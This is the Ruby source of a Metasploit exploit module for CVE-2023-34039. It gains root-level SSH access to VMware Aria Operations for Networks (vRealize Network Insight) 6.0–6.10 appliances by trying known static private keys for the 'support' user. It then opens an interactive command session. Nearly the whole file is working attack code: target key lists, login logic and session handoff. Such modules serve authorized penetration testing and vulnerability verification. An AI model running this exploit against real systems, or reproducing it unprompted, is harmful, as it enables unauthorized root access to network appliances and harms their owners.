GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/ssh'
require 'net/ssh/command_stream'
# Exploit module for CVE-2023-34039: affected VMware Aria Operations for
# Networks appliances ship with non-randomized SSH keys (see 'Description'
# below), so a public-key login as the 'support' user succeeds with a known
# static private key. The module only performs an SSH login and hands the
# resulting session to the payload handler; no further exploitation logic
# is involved. Logins are declared as IOC_IN_LOGS, i.e. they are expected to
# show up in the appliance's SSH/auth logging.
class MetasploitModule < Msf::Exploit::Remote
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::SSH

  Rank = ExcellentRanking

  # Module metadata and options.
  #
  # Each versioned target maps to exactly one static private-key file under
  # <Msf::Config.data_directory>/exploits/CVE-2023-34039. Targets 0-21 are the
  # per-version/per-role keys; index 22 is the synthetic 'All' target, which
  # carries no key of its own and is expanded at run time in #exploit to every
  # other target's key. 'DefaultTarget' => 22 therefore selects 'All'.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure',
          'Description' => %q{
            VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0
            do not randomize the SSH keys on virtual machine initialization. Since the key is easily
            retrievable, an attacker can use it to gain unauthorized remote access as the "support" (root) user.
          },
          'Platform' => 'unix',
          'Arch' => ARCH_CMD,
          # The Description states the 'support' account is root.
          'Privileged' => true,
          # Target name format: "<major.minor>_<role>"; key file name format:
          # "id_rsa_vnera_keypair_<major.minor.0>_<role>".
          'Targets' => [
            [ '6.0_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.0.0_platform') } ],
            [ '6.0_proxy', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.0.0_proxy') } ],
            [ '6.1_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.1.0_platform') } ],
            [ '6.1_proxy', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.1.0_proxy') } ],
            [ '6.2_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.2.0_collector') } ],
            [ '6.2_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.2.0_platform') } ],
            [ '6.3_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.3.0_collector') } ],
            [ '6.3_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.3.0_platform') } ],
            [ '6.4_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.4.0_collector') } ],
            [ '6.4_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.4.0_platform') } ],
            [ '6.5_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.5.0_collector') } ],
            [ '6.5_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.5.0_platform') } ],
            [ '6.6_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.6.0_collector') } ],
            [ '6.6_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.6.0_platform') } ],
            [ '6.7_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.7.0_collector') } ],
            [ '6.7_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.7.0_platform') } ],
            [ '6.8_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.8.0_collector') } ],
            [ '6.8_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.8.0_platform') } ],
            [ '6.9_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.9.0_collector') } ],
            [ '6.9_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.9.0_platform') } ],
            [ '6.10_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.10.0_collector') } ],
            [ '6.10_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.10.0_platform') } ],
            [
              # Index 22: no 'key' entry; #exploit substitutes every other
              # target's key when this target is selected.
              'All', {} # built later
            ],
          ],
          # The payload rides the SSH session returned by #do_login;
          # #exploit passes its socket to handler().
          'Payload' => {
            'Compat' => {
              'PayloadType' => 'cmd_interact',
              'ConnectionType' => 'find'
            }
          },
          'Author' => [
            'h00die', # MSF module
            'SinSinology', # PoC
            'Harsh Jaiswal (@rootxharsh)', # Discovery
            'Rahul Maini (@iamnoooob)' # Discovery
          ],
          'License' => MSF_LICENSE,
          'References' => [
            ['CVE', '2023-34039'],
            ['URL', 'https://github.com/sinsinology/CVE-2023-34039'],
            ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/'],
            ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0018.html'],
            ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH],
          ],
          'DisclosureDate' => '2023-08-29',
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
          # 22 == the 'All' entry above (targets are 0-indexed).
          'DefaultTarget' => 22,
          'Notes' => {
            'Stability' => [CRASH_SAFE],
            'Reliability' => [REPEATABLE_SESSION],
            # Every login attempt is an SSH authentication event on the
            # appliance, so it is expected to be visible in its logs.
            'SideEffects' => [IOC_IN_LOGS]
          }
        }
      )
    )

    register_options(
      [
        # Since we don't include Tcp, we have to register this manually
        Opt::RHOST(),
        Opt::RPORT(22)
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        # Only consulted by #exploit for the 'All' target; a single-key
        # target stops after its one attempt regardless.
        OptBool.new('STOP_ON_SUCCESS', [ false, 'Stop on successful login', true]),
        # Bounds only the Net::SSH.start negotiation in #do_login.
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time in seconds to negotiate a SSH session', 30])
      ]
    )
  end

  # helper methods that normally come from Tcp

  # @return [String] the RHOST datastore value
  def rhost
    datastore['RHOST']
  end

  # @return [Integer] the RPORT datastore value (defaults to 22 above)
  def rport
    datastore['RPORT']
  end

  # Attempts a public-key SSH login as +user+ using the supplied private key.
  #
  # Failures are reported with print_error and turned into a nil return; none
  # of the rescued exception classes propagate to the caller.
  #
  # @param user [String] SSH username ('support' from #exploit)
  # @param key_data [String] raw private-key file contents, handed to
  #   Net::SSH as-is via the +key_data+ option (no passphrase is supplied)
  # @return [Net::SSH::CommandStream, nil] an interactive command stream on
  #   success, nil on any rescued failure
  def do_login(user, key_data)
    # Public-key auth only: no password or keyboard-interactive fallback.
    opt_hash = ssh_client_defaults.merge({
      auth_methods: ['publickey'],
      port: rport,
      key_data: [ key_data ]
    })
    opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']
    begin
      ssh_socket = nil
      # Only the connect/negotiate/authenticate phase is time-bounded.
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh_socket = Net::SSH.start(rhost, user, opt_hash)
      end
    rescue Rex::ConnectionError
      print_error "#{rhost}:#{rport} SSH - Unable to connect"
      return nil
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return nil
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return nil
    rescue Net::SSH::AuthenticationFailed
      # Expected outcome when the selected key does not match this appliance.
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
      return nil
    rescue Net::SSH::Exception => e
      # Catch-all for remaining Net::SSH errors; listed last so the more
      # specific subclasses above are matched first.
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return nil
    end

    if ssh_socket
      # Create a new session from the socket, then close it.
      conn = Net::SSH::CommandStream.new(ssh_socket, logger: self)
      # Drop the local reference now that the stream wraps the connection.
      ssh_socket = nil

      return conn
    end
    nil
  end

  # Tries each candidate key in turn and hands every successful session to
  # the payload handler.
  #
  # For the 'All' target the candidate list is every other target's 'key'
  # path; otherwise it is just the selected target's key. Note that
  # File.read has no rescue here: a key file missing from the data directory
  # raises (Errno::ENOENT) and aborts the run instead of being skipped.
  #
  # @return [void]
  def exploit
    if target.name == 'All'
      keys = targets.filter_map { |t| t.opts['key'] if t.name != 'All' }
    else
      keys = [target.opts['key']]
    end

    keys.each do |key|
      vprint_status("Attempting key: #{key}")
      # Binary-safe read; the bytes go straight to Net::SSH in #do_login.
      key_data = File.read(key, mode: 'rb')
      conn = do_login('support', key_data)
      next unless conn

      print_good "#{rhost}:#{rport} - Successful login via support@#{rhost}:#{rport} and ssh key: #{key}"
      handler(conn.lsock)
      # With STOP_ON_SUCCESS false, the remaining keys are still tried and
      # each further success gets its own handler call.
      break if datastore['STOP_ON_SUCCESS']
    end
  end
end